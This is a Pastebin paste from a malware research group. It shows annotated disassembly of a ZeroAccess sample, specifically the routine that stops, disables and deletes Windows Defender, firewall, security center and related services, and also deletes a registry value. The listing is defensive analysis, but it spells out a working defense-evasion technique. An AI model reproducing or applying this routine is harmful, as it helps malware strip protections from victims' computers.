SHARE
TWEET

#MalwareMustDie! ZeroAccess: killing processes PoC

MalwareMustDie Feb 6th, 2013 169 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie! Case contants.exe ZeroAccess RECYCLER
  2. // Case: http://malwaremustdie.blogspot.jp/2013/02/blackhole-of-closest-version-with.html
  3. // In the .text PE section found the operation
  4. // to close all processes of :
  5. // MsMpSvc, windefen, SharedAccess, iphlpsvc, wscsvc, mpssvc, bfe
  6. // @unixfreaxjp /malware]$ date | Wed Feb  6 15:53:41 JST 2013
  7.  
  8. // usage of DisableThreadLibraryCalls :
  9. //  A function lets a DLL disable the DLL_THREAD_ATTACH and DLL_THREAD_DETACH notification calls.
  10.  
  11. 0x4017FB     push    [ebp+hLibModule] ; hLibModule
  12. 0x4017FE     call    ds:DisableThreadLibraryCalls
  13. 0x401804     call    sub_4016D1
  14. 0x401809     test    eax, eax
  15. 0x40180B     jz      short loc_401832
  16.  
  17. // Opening keyroot
  18.  
  19. 0x402659     call    ds:ZwOpenKey
  20. 0x40265F     test    eax, eax
  21. 0x402661     jl      short loc_40267A
  22. 0x402663     push    offset asc_41D0DC ; " \""
  23. 0x402668     push    [ebp+hSCObject]
  24. 0x40266B     call    ds:ZwDeleteValueKey
  25. 0x402671     push    [ebp+hSCObject]
  26. 0x402674     call    ds:ZwClose
  27.  
  28. // Using the OpenSCManagerW
  29.  
  30. 0x40267A loc_40267A:     ; CODE XREF: sub_402634+2Dj
  31. 0x40267A     push    0F003Fh         ; dwDesiredAccess
  32. 0x40267F     push    0   ; lpDatabaseName
  33. 0x402681     push    0   ; lpMachineName
  34. 0x402683     call    ds:OpenSCManagerW ; Establish a connection to the service
  35.                                        ; control manager on the specified computer
  36.                                        ; and opens the specified database
  37. 0x402689     mov     [ebp+hSCObject], eax
  38. 0x40268C     test    eax, eax
  39. 0x40268E     jz      loc_40274B
  40. 0x402694     push    ebx
  41. 0x402695     push    esi
  42. 0x402696     push    edi
  43.  
  44. // opening service "MsMpSvc"
  45.  
  46. 0x402697     mov     edi, ds:OpenServiceW
  47. 0x40269D     mov     ebx, 0F01FFh
  48. 0x4026A2     push    ebx ; dwDesiredAccess
  49. 0x4026A3     push    offset ServiceName ; "MsMpSvc"
  50. 0x4026A8     push    eax ; hSCManager
  51. 0x4026A9     call    edi ; OpenServiceW
  52. 0x4026AB     test    eax, eax
  53. 0x4026AD     jz      short loc_4026B6
  54. 0x4026AF     mov     esi, eax
  55. 0x4026B1     call    sub_4024E2
  56.  
  57. // opening service "windefen"
  58.  
  59. 0x4026B6 loc_4026B6:     ; CODE XREF: sub_402634+79j
  60. 0x4026B6     push    ebx ; dwDesiredAccess
  61. 0x4026B7     push    offset aWindefend ; "windefend"
  62. 0x4026BC     push    [ebp+hSCObject] ; hSCManager
  63. 0x4026BF     call    edi ; OpenServiceW
  64. 0x4026C1     test    eax, eax
  65. 0x4026C3     jz      short loc_4026CC
  66. 0x4026C5     mov     esi, eax
  67. 0x4026C7     call    sub_4024E2
  68.  
  69. // opening service "SharedAccess"
  70.  
  71. 0x4026CC loc_4026CC:     ; CODE XREF: sub_402634+8Fj
  72. 0x4026CC     push    ebx ; dwDesiredAccess
  73. 0x4026CD     push    offset aSharedaccess ; "SharedAccess"
  74. 0x4026D2     push    [ebp+hSCObject] ; hSCManager
  75. 0x4026D5     call    edi ; OpenServiceW
  76. 0x4026D7     test    eax, eax
  77. 0x4026D9     jz      short loc_4026E2
  78. 0x4026DB     mov     esi, eax
  79. 0x4026DD     call    sub_4024E2
  80. 0x4026E2
  81.  
  82. // opening service "iphlpsvc"
  83.  
  84. 0x4026E2 loc_4026E2:     ; CODE XREF: sub_402634+A5j
  85. 0x4026E2     push    ebx ; dwDesiredAccess
  86. 0x4026E3     push    offset aIphlpsvc ; "iphlpsvc"
  87. 0x4026E8     push    [ebp+hSCObject] ; hSCManager
  88. 0x4026EB     call    edi ; OpenServiceW
  89. 0x4026ED     test    eax, eax
  90. 0x4026EF     jz      short loc_4026F8
  91. 0x4026F1     mov     esi, eax
  92. 0x4026F3     call    sub_4024E2
  93. 0x4026F8
  94.  
  95. // opening service "wscsvc"
  96.  
  97. 0x4026F8 loc_4026F8:     ; CODE XREF: sub_402634+BBj
  98. 0x4026F8     push    ebx ; dwDesiredAccess
  99. 0x4026F9     push    offset aWscsvc  ; "wscsvc"
  100. 0x4026FE     push    [ebp+hSCObject] ; hSCManager
  101. 0x402701     call    edi ; OpenServiceW
  102. 0x402703     test    eax, eax
  103. 0x402705     jz      short loc_40270E
  104. 0x402707     mov     esi, eax
  105. 0x402709     call    sub_4024E2
  106. 0x40270E
  107.  
  108. // opening service "mpssvc"
  109.  
  110. 0x40270E loc_40270E:     ; CODE XREF: sub_402634+D1j
  111. 0x40270E     push    ebx ; dwDesiredAccess
  112. 0x40270F     push    offset aMpssvc  ; "mpssvc"
  113. 0x402714     push    [ebp+hSCObject] ; hSCManager
  114. 0x402717     call    edi ; OpenServiceW
  115. 0x402719     test    eax, eax
  116. 0x40271B     jz      short loc_402724
  117. 0x40271D     mov     esi, eax
  118. 0x40271F     call    sub_4024E2
  119. 0x402724
  120.  
  121. // opening service "bfe"
  122.  
  123. 0x402724 loc_402724:     ; CODE XREF: sub_402634+E7j
  124. 0x402724     push    ebx ; dwDesiredAccess
  125. 0x402725     push    offset aBfe     ; "bfe"
  126. 0x40272A     push    [ebp+hSCObject] ; hSCManager
  127. 0x40272D     call    edi ; OpenServiceW
  128. 0x40272F     test    eax, eax
  129. 0x402731     jz      short loc_40273A
  130. 0x402733     mov     esi, eax
  131. 0x402735     call    sub_4024E2
  132. 0x40273A
  133.  
  134. // Close them handles..
  135.  
  136. 0x40273A loc_40273A:     ; CODE XREF: sub_402634+FDj
  137. 0x40273A     push    [ebp+hSCObject] ; hSCObject
  138. 0x40273D     call    ds:CloseServiceHandle
  139. 0x402743     call    sub_402593
  140. 0x402748     pop     edi
  141. 0x402749     pop     esi
  142. 0x40274A     pop     ebx
  143.  
  144. // Checking those services...
  145.  
  146. 0x4024E2 sub_4024E2      proc near ;
  147. 0x4024E2
  148. 0x4024E2 ServiceStatus   = _SERVICE_STATUS ptr -1Ch
  149. 0x4024E2
  150. 0x4024E2     sub     esp, 1Ch
  151. 0x4024E5     push    edi
  152. 0x4024E6     push    4
  153. 0x4024E8     pop     edi
  154. 0x4024E9
  155.  
  156. // preparations...
  157.  
  158. 0x4024E9 loc_4024E9:                 ;
  159. 0x4024E9     lea     eax, [esp+20h+ServiceStatus]
  160. 0x4024ED     push    eax             ; lpServiceStatus
  161. 0x4024EE     push    1               ; dwControl
  162. 0x4024F0     push    esi             ; hService
  163. 0x4024F1     call    ds:ControlService ; <==========To control code to a Win32 service
  164. 0x4024F7     test    eax, eax
  165. 0x4024F9     jnz     short loc_402516
  166. 0x4024FB     call    ds:GetLastError
  167. 0x402501     cmp     eax, 41Bh
  168. 0x402506     jnz     short loc_402516
  169. 0x402508     push    3E8h            ; dwMilliseconds
  170. 0x40250D     call    ds:Sleep
  171. 0x402513     dec     edi
  172. 0x402514     jnz     short loc_4024E9
  173. 0x402516
  174. 0x402516 loc_402516:              
  175. 0x402516     xor     eax, eax
  176. 0x402518     push    eax             ; lpDisplayName
  177. 0x402519     push    eax             ; lpPassword
  178. 0x40251A     push    eax             ; lpServiceStartName
  179. 0x40251B     push    eax             ; lpDependencies
  180. 0x40251C     push    eax             ; lpdwTagId
  181. 0x40251D     push    eax             ; lpLoadOrderGroup
  182. 0x40251E     push    eax             ; lpBinaryPathName
  183. 0x40251F     push    eax             ; dwErrorControl
  184. 0x402520     push    4               ; dwStartType
  185. 0x402522     push    20h             ; dwServiceType
  186. 0x402524     push    esi             ; hService
  187.  
  188. // stop it all....
  189.  
  190. 0x402525     call    ds:ChangeServiceConfigW <=== triger to change status service..
  191. 0x40252B     push    esi             ; <========value of hService
  192. 0x40252C     call    ds:DeleteService
  193. 0x402532     push    esi             ; <=== value of hSCObject
  194. 0x402533     call    ds:CloseServiceHandle
  195. 0x402539     pop     edi
  196. 0x40253A     add     esp, 1Ch
  197. 0x40253D     retn
  198. 0x40253D sub_4024E2      endp
  199.  
  200. ---
  201. #MalwareMustDie
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top